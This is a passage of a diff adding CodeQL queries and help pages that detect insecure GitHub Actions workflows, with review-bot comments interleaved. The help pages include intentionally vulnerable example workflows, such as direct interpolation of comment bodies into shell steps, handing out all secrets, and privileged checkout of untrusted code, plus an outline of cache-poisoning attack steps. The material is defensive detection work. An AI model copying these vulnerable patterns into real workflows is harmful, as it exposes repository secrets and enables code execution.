codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks + +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event +where + job.isPrivileged() and + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() diff --git a/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md new file mode 100644 index 000000000000..9351af5cf1e2 --- /dev/null 
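Review bot: In the `where` clause the second disjunct `not exists(job.getATriggerEvent())` leaves `event` unconstrained, so for a job without trigger events the query ranges over every `Event` in the database and the result is only deduplicated because `event` is not selected; scoping the variable to the branch that uses it is cheaper and clearer. Also, `pull_request_target` without an explicit `types:` list defaults to `opened`, `synchronize` and `reopened`; if `getAnActivityType()` only returns explicitly listed types, the most common vulnerable form is missed, which is worth a comment or an extra check. The rewritten condition:

```ql
from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout
where
  job.isPrivileged() and
  job.getAStep() = checkout and
  check.dominates(checkout) and
  (
    // the job re-runs on every push to the PR, after the label was applied
    exists(Event event |
      job.getATriggerEvent() = event and
      event.getName() = "pull_request_target" and
      event.getAnActivityType() = "synchronize"
    )
    or
    not exists(job.getATriggerEvent())
  )
// … unchanged: select …
```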
+++ b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md @@ -0,0 +1,52 @@ +# Excessive Secrets Exposure + +## Description + +When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow. + +## Recommendations + +Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used. + +## Examples + +### Incorrect Usage + +```yaml +env: + ALL_SECRETS: ${{ toJSON(secrets) }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +env: + GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }} +``` + +### Correct Usage + +```yaml +env: + NEEDED_SECRET: ${{ secrets.GH_PAT }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +--- +if: matrix.env == "PROD" +env: + GH_TOKEN: ${{ secrets.GH_PAT_PROD }} +--- +if: matrix.env == "DEV" +env: + GH_TOKEN: ${{ secrets.GH_PAT_DEV }} +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) +- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md) diff --git a/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql new file mode 100644 index 000000000000..c1d22e3a1811 --- /dev/null +++ b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql 
@@ -0,0 +1,23 @@
+/**
+ * @name Excessive Secrets Exposure
+ * @description All organization and repository secrets are passed to the workflow runner.
+ * @kind problem
+ * @problem.severity recommendation
+ * @id actions/excessive-secrets-exposure
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+import codeql.actions.ast.internal.Ast
+
+from Expression expr
+where
+ getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%")
+ or
+ expr.getExpression().matches("secrets[%") and
+ not expr.getExpression().matches("secrets[\"%") and
+ not expr.getExpression().matches("secrets['%")
+select expr, "All organization and repository secrets are passed to the workflow runner in $@",
+ expr, expr.getExpression()
diff --git a/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md
new file mode 100644
index 000000000000..5b05c9a118fa
--- /dev/null
+++ b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md
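Review bot: The second disjunct, `expr.getExpression().matches("secrets[%")`, is a prefix match, so a dynamic lookup nested inside a larger expression (for example within a `format(...)` or `toJSON(...)` call) is never reported even though it forces the same "all secrets" hand-off; `"%secrets[%"` together with the two exclusions widened to `"%secrets[\"%"` and `"%secrets['%"` covers the nested case, and a `secrets[ 'NAME' ]` spelling with inner whitespace would still be treated as dynamic, which is worth a comment. The metadata block also omits `@precision` and `@security-severity`, which every sibling query in this directory declares; without `@precision` the query is unlikely to be picked up by the standard suites.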
@@ -0,0 +1,47 @@
+# Storage of sensitive information in GitHub Actions artifact
+
+## Description
+
+Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published.
+
+## Recommendation
+
+Only store information that is meant to be publicly available in a GitHub Actions artifact.
+
+## Example
+
+The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact:
+
+```yaml
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ a-job: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: .
+```
+
+The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact.
+
+```yaml
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ a-job: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@v4
+ with:
+ name: file
+ path: .
+```
diff --git a/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql
new file mode 100644
index 000000000000..836f1c7dec28
--- /dev/null
+++ b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql
@@ -0,0 +1,46 @@
+/**
+ * @name Storage of sensitive information in GitHub Actions artifact
+ * @description Including sensitive information in a GitHub Actions artifact can
+ * expose it to an attacker.
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 7.5
+ * @precision high
+ * @id actions/secrets-in-artifacts
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from UsesStep checkout, UsesStep upload
+where
+ checkout.getCallee() = "actions/checkout" and
+ upload.getCallee() = "actions/upload-artifact" and
+ checkout.getAFollowingStep() = upload and
+ (
+ not exists(checkout.getArgument("persist-credentials")) or
+ checkout.getArgument("persist-credentials") = "true"
+ ) and
+ upload.getVersion() =
+ [
+ "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", //
+ "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", //
+ "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", //
+ "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", //
+ "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", //
+ "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", //
+ "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", //
+ "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", //
+ "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", //
+ "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", //
+ ] and
+ (
+ not exists(checkout.getArgument("path")) and
+ upload.getArgument("path") = [".", "*"]
+ or
+ checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path")
+ )
+select upload, "A secret is exposed in an artifact uploaded by $@", upload,
+ "actions/upload-artifact"
diff --git a/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
new file mode 100644
index 000000000000..6c681856a7b3
--- /dev/null
+++ b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
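Review bot: The version allowlist compared against `upload.getVersion()` is undocumented: nothing in the query says these are the v4.x releases whose upload still includes hidden files such as `.git/config`, nor whether v1–v3 tags are deliberately out of scope (if older majors share that behaviour they are silently missed here, and a floating `v4` tag is treated as safe). A comment above the list would make the intent checkable, e.g. `// actions/upload-artifact releases that still include hidden files (e.g. .git/config) in the artifact; later releases exclude them by default`, plus one line on why older majors are not listed. The `persist-credentials` comparison `= "true"` also depends on how the extractor renders YAML booleans (`True`, `TRUE`), which cannot be confirmed from this hunk and is worth noting next to the check.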
@@ -0,0 +1,37 @@
+# Unmasked Secret Exposure
+
+## Description
+
+Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered.
+
+## Recommendations
+
+Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+- env:
+ username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }}
+ password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }}
+ run: |
+ echo "$username"
+ echo "$password"
+```
+
+### Correct Usage
+
+```yaml
+- env:
+ username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }}
+ password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }}
+ run: |
+ echo "$username"
+ echo "$password"
+```
+
+## References
+
+- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow)
diff --git a/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
new file mode 100644
index 000000000000..961af6f267be
--- /dev/null
+++ b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
@@ -0,0 +1,19 @@
+/**
+ * @name Unmasked Secret Exposure
+ * @description Secrets derived from other secrets are not masked by the workflow runner.
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/unmasked-secret-exposure
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from Expression expr
+where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*")
+select expr, "An unmasked secret derived from another secret may be exposed in $@", expr,
+ expr.getExpression()
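Review bot: The regex on the `where` line only recognises `fromJSON(secrets.NAME)`; the bracket forms `fromJSON(secrets['NAME'])` and `fromJSON(secrets["NAME"])`, or a call with inner whitespace such as `fromJSON( secrets.NAME )`, yield the same unmasked value and are missed. `where expr.getExpression().regexpMatch("(?i).*fromjson\\(\\s*secrets\\s*[.\\[].*\\)\\..*")` covers both spellings with a one-line change. A short comment stating that the pattern is intentionally loose (any property read on a `fromJSON` of a secret, case-insensitive) would also help the next maintainer judge false positives.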
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
new file mode 100644
index 000000000000..667c41dc153e
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
@@ -0,0 +1,83 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL.
+2. Overflow the cache to trigger eviction of legitimate entries.
+3. Poison cache entries with malicious payloads.
+4. Achieve code execution in privileged workflows that restore the poisoned cache.
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use.
+ - Use short-lived, workflow-specific cache keys.
+ - Clear caches regularly.
+3. Implement strict isolation between untrusted and privileged workflow execution.
+4. Never run untrusted code in the context of the default branch.
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: {}
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo ${{ github.event.comment.body }}
+```
+
+### Correct Usage
+
+The following workflow is not vulnerable to code injections even if it runs in the context of the default branch.
+
+```yaml
+name: Secure Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: {}
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ echo "$BODY"
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
new file mode 100644
index 000000000000..23e1f223073f
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
@@ -0,0 +1,48 @@
+/**
+ * @name Cache Poisoning via low-privileged code injection
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/cache-poisoning/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.security.CodeInjectionQuery
+import codeql.actions.security.CachePoisoningQuery
+import CodeInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
+
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event
+where
+ CodeInjectionFlow::flowPath(source, sink) and
+ job = sink.getNode().asExpr().getEnclosingJob() and
+ job.getATriggerEvent() = event and
+ // job can be triggered by an external user
+ event.isExternallyTriggerable() and
+ // the checkout is not controlled by an access check
+ not exists(ControlCheck check |
+ check.protects(source.getNode().asExpr(), event, "code-injection")
+ ) and
+ // excluding privileged workflows since they can be exploited in easier circumstances
+ // which is covered by `actions/code-injection/critical`
+ not job.isPrivilegedExternallyTriggerable(event) and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(event)
+ or
+ // the workflow caller runs in the context of the default branch
+ event.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = job.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ )
+select sink.getNode(), source, sink,
+ "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName()
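Review bot: The comment `// the checkout is not controlled by an access check` above the `not exists(ControlCheck check | ...)` clause looks copied from the checkout queries; this clause guards a code-injection source, so `// the injection source is not controlled by an access check` describes what the code does. The `caller.getCallee() = job.getLocation().getFile().getRelativePath()` comparison in the `workflow_call` branch presumes both sides use the same path form (repository-relative, no leading `./`), which this hunk cannot confirm and which deserves a one-line comment, since a mismatch would silently drop every reusable-workflow result rather than fail loudly.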
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
new file mode 100644
index 000000000000..c12fb7998929
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
@@ -0,0 +1,128 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL.
+2. Overflow the cache to trigger eviction of legitimate entries.
+3. Poison cache entries with malicious payloads.
+4. Achieve code execution in privileged workflows that restore the poisoned cache.
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use.
+ - Use short-lived, workflow-specific cache keys.
+ - Clear caches regularly.
+3. Implement strict isolation between untrusted and privileged workflow execution.
+4. Never run untrusted code in the context of the default branch.
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_sha }}
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+```
+
+### Correct Usage
+
+The following workflow checking out untrusted files, but the cache is scoped to the Pull Request.
+
+```yaml
+name: Secure Workflow
+on:
+ pull_request:
+
+jobs:
+ pr-comment:
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+```
+
+Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label.
+
+```yaml
+name: Secure Workflow
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ pr-comment:
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha}}
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql
new file mode 100644
index 000000000000..85a0f53df1dc
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql
@@ -0,0 +1,71 @@
+/**
+ * @name Cache Poisoning via caching of untrusted files
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/cache-poisoning/direct-cache
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ */
+
+import actions
+import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.CachePoisoningQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
+
+from LocalJob job, Event event, Step source, Step step, string message, string path
+where
+ // the job checkouts untrusted code from a pull request or downloads an untrusted artifact
+ job.getAStep() = source and
+ (
+ source instanceof PRHeadCheckoutStep and
+ message = "due to privilege checkout of untrusted code." and
+ path = source.(PRHeadCheckoutStep).getPath()
+ or
+ source instanceof UntrustedArtifactDownloadStep and
+ message = "due to downloading an untrusted artifact." and
+ path = source.(UntrustedArtifactDownloadStep).getPath()
+ ) and
+ // the checkout/download is not controlled by an access check
+ not exists(ControlCheck check |
+ check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"])
+ ) and
+ job.getATriggerEvent() = event and
+ // job can be triggered by an external user
+ event.isExternallyTriggerable() and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(event)
+ or
+ // the workflow's caller runs in the context of the default branch
+ event.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = job.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ ) and
+ // the job writes to the cache
+ // (No need to follow the checkout/download step since the cache is normally write after the job completes)
+ job.getAStep() = step and
+ step instanceof CacheWritingStep and
+ (
+ // we dont know what code can be controlled by the attacker
+ path = "?"
+ or
+ // we dont know what files are being cached
+ step.(CacheWritingStep).getPath() = "?"
+ or
+ // the cache writing step reads from a path the attacker can control
+ not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path)
+ ) and
+ not step instanceof PoisonableStep
+select step, source, step,
+ "Potential cache poisoning in the context of the default branch " + message + " ($@).", event,
+ event.getName()
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
new file mode 100644
index 000000000000..c777e1980393
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
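Review bot: The first `message` value, `"due to privilege checkout of untrusted code."`, has a typo (presumably `"due to privileged checkout of untrusted code."`), and because the `select` appends `" ($@)."` the rendered alert ends `...code. (pull_request_target).` with two full stops — dropping the trailing period from both `message` strings fixes that; the same strings appear in CachePoisoningViaPoisonableStep.ql (hunk ending at L613). The roughly thirty lines from `job.getAStep() = source` through the `runsOnDefaultBranch(caller.getATriggerEvent())` disjunction are also duplicated verbatim between the two queries, so a shared predicate in `codeql.actions.security.CachePoisoningQuery` (e.g. `untrustedSourceOnDefaultBranch(job, event, source, message, path)`) would keep them from drifting apart. The comment `the cache is normally write after the job completes` should read `written`, and the two `path = "?"` / `getPath() = "?"` disjuncts deserve a sentence on the precision trade-off they make, since either unknown reports every cache-writing step in the job.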
@@ -0,0 +1,85 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL.
+2. Overflow the cache to trigger eviction of legitimate entries.
+3. Poison cache entries with malicious payloads.
+4. Achieve code execution in privileged workflows that restore the poisoned cache.
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use.
+ - Use short-lived, workflow-specific cache keys.
+ - Clear caches regularly.
+3. Implement strict isolation between untrusted and privileged workflow execution.
+4. Never run untrusted code in the context of the default branch.
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow runs untrusted code in a non-privileged job but in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ pull_request_target:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+### Correct Usage
+
+The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch.
+
+```yaml
+name: Secure Workflow
+on:
+ pull_request:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
new file mode 100644
index 000000000000..95adcfaf78ec
--- /dev/null
+++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
@@ -0,0 +1,62 @@
+/**
+ * @name Cache Poisoning via execution of untrusted code
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 7.5
+ * @id actions/cache-poisoning/poisonable-step
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ */
+
+import actions
+import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.CachePoisoningQuery
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.ControlChecks
+
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
+
+from LocalJob job, Event event, Step source, Step step, string message, string path
+where
+ // the job checkouts untrusted code from a pull request or downloads an untrusted artifact
+ job.getAStep() = source and
+ (
+ source instanceof PRHeadCheckoutStep and
+ message = "due to privilege checkout of untrusted code." and
+ path = source.(PRHeadCheckoutStep).getPath()
+ or
+ source instanceof UntrustedArtifactDownloadStep and
+ message = "due to downloading an untrusted artifact." and
+ path = source.(UntrustedArtifactDownloadStep).getPath()
+ ) and
+ // the checkout/download is not controlled by an access check
+ not exists(ControlCheck check |
+ check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"])
+ ) and
+ job.getATriggerEvent() = event and
+ // job can be triggered by an external user
+ event.isExternallyTriggerable() and
+ (
+ // the workflow runs in the context of the default branch
+ runsOnDefaultBranch(event)
+ or
+ // the workflow's caller runs in the context of the default branch
+ event.getName() = "workflow_call" and
+ exists(ExternalJob caller |
+ caller.getCallee() = job.getLocation().getFile().getRelativePath() and
+ runsOnDefaultBranch(caller.getATriggerEvent())
+ )
+ ) and
+ // the job executes checked-out code
+ // (The cache specific token can be leaked even for non-privileged workflows)
+ source.getAFollowingStep() = step and
+ step instanceof PoisonableStep and
+ // excluding privileged workflows since they can be exploited in easier circumstances
+ not job.isPrivileged()
+select step, source, step,
+ "Potential cache poisoning in the context of the default branch " + message + " ($@).", event,
+ event.getName()
diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
new file mode 100644
index 000000000000..4e9b389834e8
--- /dev/null
+++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
@@ -0,0 +1,102 @@
+# Untrusted Checkout TOCTOU (Time-of-check to time-of-use)
+
+## Description
+
+Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+
+## Recommendations
+
